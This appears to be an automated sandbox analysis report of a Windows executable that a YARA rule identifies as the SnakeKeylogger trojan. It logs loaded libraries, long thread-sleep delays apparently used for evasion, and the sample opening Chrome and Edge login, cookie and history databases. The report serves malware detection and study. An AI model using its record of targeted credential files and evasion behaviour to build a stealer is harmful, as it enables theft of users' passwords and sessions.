Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: z64BLPL.exe, .cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: z64BLPL.exe, -J--.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: z64BLPL.exe, -J--.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: mscoree.dll |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: apphelp.dll |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: kernel.appcore.dll |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: version.dll |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: vcruntime140_clr0400.dll |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: ucrtbase_clr0400.dll |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: uxtheme.dll |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: rasapi32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: rasman.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: rtutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: dhcpcsvc6.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: dhcpcsvc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: secur32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: schannel.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: mskeyprotect.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: ntasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: ncrypt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: ncryptsslp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: gpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 922337203685477 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 600000 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599875 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599765 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599636 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599531 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599421 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599312 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599203 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 599093 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598984 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598875 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598765 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598656 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598546 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598437 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598328 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598218 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 598109 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597996 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597888 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597741 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597637 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597531 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597417 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597312 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597203 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 597093 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596984 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596875 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596765 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596656 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596547 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596437 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596328 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596217 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596109 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 596000 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595890 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595781 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595672 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595547 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595437 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595328 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595218 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 595109 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594993 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594890 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594781 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594671 |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Thread delayed: delay time: 594562 |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -26747778906878833s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -600000s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599875s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7368 |
Thread sleep count: 8582 > 30 |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7368 |
Thread sleep count: 1284 > 30 |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599765s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599636s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599531s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599421s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599312s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599203s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -599093s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598984s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598875s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598765s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598656s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598546s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598437s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598328s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598218s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -598109s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597996s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597888s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597741s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597637s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597531s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597417s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597312s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597203s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -597093s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596984s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596875s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596765s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596656s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596547s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596437s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596328s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596217s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596109s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -596000s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595890s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595781s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595672s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595547s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595437s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595328s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595218s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -595109s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -594993s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -594890s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -594781s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -594671s >= -30000s |
Source: C:\Users\user\Desktop\z64BLPL.exe TID: 7364 |
Thread sleep time: -594562s >= -30000s |
Source: z64BLPL.exe, 00000000.00000002.4120472413.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCult |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Users\user\Desktop\z64BLPL.exe VolumeInformation |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation |
Source: C:\Users\user\Desktop\z64BLPL.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation |
Source: Yara match |
File source: z64BLPL.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR |
Source: Yara match |
File source: z64BLPL.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR |
Source: C:\Users\user\Desktop\z64BLPL.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History |
Source: C:\Users\user\Desktop\z64BLPL.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
Source: C:\Users\user\Desktop\z64BLPL.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data |
Source: C:\Users\user\Desktop\z64BLPL.exe |
File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data |
Source: C:\Users\user\Desktop\z64BLPL.exe |
File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History |
Source: C:\Users\user\Desktop\z64BLPL.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data |
Source: C:\Users\user\Desktop\z64BLPL.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites |